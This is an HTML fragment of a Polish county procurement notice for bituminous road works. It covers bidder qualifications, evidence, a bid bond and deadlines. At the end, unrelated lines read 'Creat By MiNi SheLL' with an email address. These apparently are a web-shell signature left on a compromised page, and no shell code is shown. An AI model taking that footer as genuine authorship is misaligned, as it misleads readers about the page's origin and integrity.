Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu oraz spełniają warunki udziału w postępowaniu dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa warunku w ww. zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/> zawodowej, o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie określa warunku w ww. zakresie. <br/>3) sytuacji ekonomicznej lub finansowej: <br/> Zamawiający nie określa warunku w ww. zakresie. <br/>4) zdolności technicznej lub zawodowej – Zamawiający określa <br/>następujące warunki: <br/> a) w zakresie doświadczenia Wykonawca spełni warunek udziału w <br/>postępowaniu jeżeli wykaże, że nie wcześniej niż w okresie ostatnich 5 lat, a <br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał <br/>należycie co najmniej: <br/> jedną robotę budowlaną polegającą na remoncie, budowie lub <br/>przebudowie drogi wykonanej w technologii mas bitumicznych; <br/> <br/>b) w zakresie kwalifikacji zawodowych Wykonawca spełni warunek udziału <br/>w postępowaniu jeżeli wykaże, że dysponuje lub będzie dysponował podczas <br/>realizacji zamówienia osobami posiadającymi odpowiednie kwalifikacje <br/>zawodowe: - co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami <br/>budowlanymi w specjalności drogowej oraz doświadczenie zawodowe w <br/>kierowaniu co najmniej jedną robotą budowlaną polegającą na <br/>remoncie, budowie lub przebudowie drogi wykonanej w technologii <br/>mas bitumicznych – osoba ta będzie pełnić funkcję kierownika robót. <br/>Osoby te muszą posiadać odpowiednie kwalifikacje zawodowe do wykonywania <br/>samodzielnych funkcji technicznych w budownictwie oraz ważne zaświadczenie <br/>o wpisaniu na listę członków właściwej izby samorządu zawodowego, zgodnie z <br/>treścią art. 12 ust. 2 i ust. 7 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane <br/>(Dz. U. z 2023 r. poz. 682 z późn. zm.) oraz rozporządzeniem Ministra Inwestycji <br/>i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do <br/>wykonywania samodzielnych funkcji technicznych w budownictwie (tj. Dz. U z <br/>2019 r. poz. 831 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, <br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/> <br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na <br/>zdolnościach tych Wykonawców, którzy wykonają roboty budowlane lub usługi do <br/>realizacji, których te zdolności są wymagane. <br/> <br/>3. W przypadku posługiwania się przez Wykonawcę cudzym potencjałem, <br/>Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, <br/>jeżeli podmioty te wykonają roboty budowlane, do realizacji których te zdolności <br/>są wymagane. <br/> <br/>4. Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym <br/>etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, <br/>jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności <br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne <br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na <br/>realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy <br/>Pzp). <br/> <br/>5. Zamawiający wymaga wskazania przez wykonawcę w ofercie części <br/>zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz <br/>podania przez Wykonawcę firm (nazw) podwykonawców (o ile są mu znane na tym <br/>etapie postępowania). Informacji należy udzielić na formularzu ofertowym. W <br/>przypadku, gdy Wykonawca nie powierza wykonania żadnej części zamówienia <br/>podwykonawcom, należy zamieścić informację „nie dotyczy”. <br/> <br/>6. Jeżeli zamawiający stwierdzi, że wobec danego podwykonawcy lub dalszego <br/>podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest <br/>zastąpić tego podwykonawcę lub dalszego podwykonawcę, bądź zrezygnować z <br/>powierzenia wykonania części zamówienia podwykonawcy lub dalszemu <br/>podwykonawcy. <br/> <br/>7. Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia <br/>wykonawcy <br/>z odpowiedzialności za należyte wykonanie tego zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wraz z ofertą Wykonawca<br/> jest zobowiązany złożyć aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu z postępowania na mocy art.<br/> 108 ust. 1 ustawy Pzp oraz art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/> wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 1497 z późn. zm.) <br/>zgodne ze wzorem określonym w załączniku nr 2 do SWZ. Oświadczenie składa się, pod rygorem nieważności, w formie<br/> elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Informacje zawarte w<br/> oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania.<br/> 2. W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu Wykonawca, którego oferta zostanie oceniona<br/> najwyżej, na wezwanie Zamawiającego przedłoży oświadczenie w zakresie 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do<br/> tej samej grupy kapitałowej z innym wykonawcą, który złożył odrębną ofertę w postępowaniu. Oświadczenie sporządzić należy<br/> zgodnie z załącznikiem nr 12 do SWZ, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/> podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wraz<br/> z ofertą Wykonawca jest zobowiązany złożyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/> postępowaniu – zgodne ze wzorem określonym w załączniku nr 3 do SWZ. Oświadczenie składa się, pod rygorem nieważności, w<br/> formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Informacje zawarte w<br/> oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu.<br/> 2. W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawca, którego oferta zostanie oceniona najwyżej, na<br/> wezwanie Zamawiającego przedłoży:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie <br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w <br/>tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca <br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, <br/>oraz załączeniem dowodów określających, czy te roboty budowlane <br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są <br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz <br/>którego roboty budowlane zostały wykonane, a jeżeli wykonawca z <br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów – inne odpowiednie dokumenty. <br/> Wykaz należy sporządzić zgodnie z załącznikiem nr 5 do SWZ, w formie <br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym <br/>lub podpisem osobistym. <br/> <br/> b) wykaz osób, które będą uczestniczyć w realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, <br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z <br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/>informacją o podstawie do dysponowania tymi osobami. <br/>Wykaz sporządzić należy zgodnie z załącznikiem nr 6 do SWZ, w formie <br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym <br/>lub podpisem osobistym.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest <br/>wnieść wadium w wysokości 3 000,00 (słownie złotych: trzy tysiące) <br/> <br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje <br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, <br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/> <br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym <br/>przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z <br/>wniesieniem nowego wadium na przedłużony okres związania ofertą. <br/> <br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku <br/>następujących formach: <br/> 1) pieniądzu; <br/> 2) gwarancjach bankowych; <br/> 3) gwarancjach ubezpieczeniowych; <br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 <br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (Dz. U. z 2023 r. poz. 462 z późn. zm.). <br/>5. Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy o numerze <br/>68 9206 0009 0004 9386 2000 0070 w Banku Spółdzielczym w <br/>Trzebieszowie. W tytule przelewu należy wpisać: wadium do postępowania <br/>AZ.262.27.2024 <br/> <br/>6. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium <br/>przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. <br/> <br/>7. W przypadku wniesienia wadium w formie poręczeń lub gwarancji należy <br/>załączyć do oferty w oryginale, w postaci dokumentu elektronicznego podpisanego <br/>podpisem elektronicznym przez upoważnionego wystawcę dokumentu i powinno <br/>zawierać: - nazwę zleceniodawcy (Wykonawcy), beneficjenta gwarancji (Zamawiającego), <br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Jako Beneficjenta wadium <br/>wnoszonego w formie poręczeń lub gwarancji należy wskazać – „Powiat <br/>Łukowski z siedzibą przy ul. Piłsudskiego 17, 21-400 Łuków”. - określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem; - kwotę gwarancji/poręczenia; - termin ważności gwarancji/poręczenia; - zobowiązania gwaranta do zapłacenia kwoty gwarancji/poręczenia <br/>bezwarunkowo, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach <br/>określonych w art. 98 ust. 6 ustawy Pzp. <br/> <br/>8. W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób <br/>nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu <br/>związania z ofertą lub złożył wniosek o zwrot wadium , w przypadku o którym <br/>mowa w art. 98 ust.2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie <br/>art. 226 ust. 1 pkt 14 ustawy Pzp. <br/> <br/>9. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. <br/>1-5 ustawy Pzp. <br/> <br/>10. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. <br/>6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/> 1) Oświadczenia:<br/> a) o niepodleganiu wykluczeniu z postępowania na mocy art. 108 ust. 1 ustawy Pzp oraz art. 7 ust 1 ustawy z dnia 13<br/> kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/> ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r., poz. 1497 z późn. zm.) – zgodne ze wzorem określonym w<br/> załączniku nr 2 do SWZ,<br/> b) o spełnianiu warunków udziału w postępowaniu – zgodne ze wzorem określonym w załączniku nr 3 do SWZ, składa każdy<br/> z Wykonawców wspólnie ubiegający się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia<br/> oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/> warunków udziału w postępowaniu.<br/> 2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia<br/> umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.<br/> 3) Wykonawcy składają oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy - zgodne ze<br/> wzorem określonym w załączniku nr 4 do SWZ.<br/> 4) W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o zamówienie, Zamawiający może żądać przed<br/> zawarciem umowy w sprawie zamówienia kopii umowy regulującej współpracę tych Wykonawców.<br/> 5) Oświadczenia i pełnomocnictwo składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/> elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Nie przewiduje się istotnej zmiany przedmiotowej umowy, w rozumieniu art. 454 Pzp. <br/>2. Dopuszcza się zmianę umowy bez przeprowadzenia nowego postępowania <br/>o udzielenie zamówienia:<br/>1) gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę, w sytuacji gdy:<br/>a) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy, lub<br/>b) w wyniku przejęcia przez Zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1 Pzp;<br/>2) z zastrzeżeniem art. 455 ust.3 Pzp, jeżeli dotyczy realizacji, przez dotychczasowego wykonawcę, dodatkowych dostaw, usług lub robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z wyjątkiem należycie uzasadnionych przypadków;<br/>3) jeżeli konieczność zmiany umowy, w tym w szczególności zmiany wysokości ceny, spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy.<br/>3. Dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 15%, w przypadku zamówień na roboty budowlane, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/>4. Jeżeli umowa zawiera postanowienia dotyczące zasad wprowadzania zmian wysokości cen, dopuszczalną wartość zmiany ceny, o której mowa w ust. 2 pkt 2 lit. c i pkt 3, lub dopuszczalną wartość zmiany umowy, o której mowa w ust. 3, ustala się w oparciu o zmienioną cenę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/180219/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com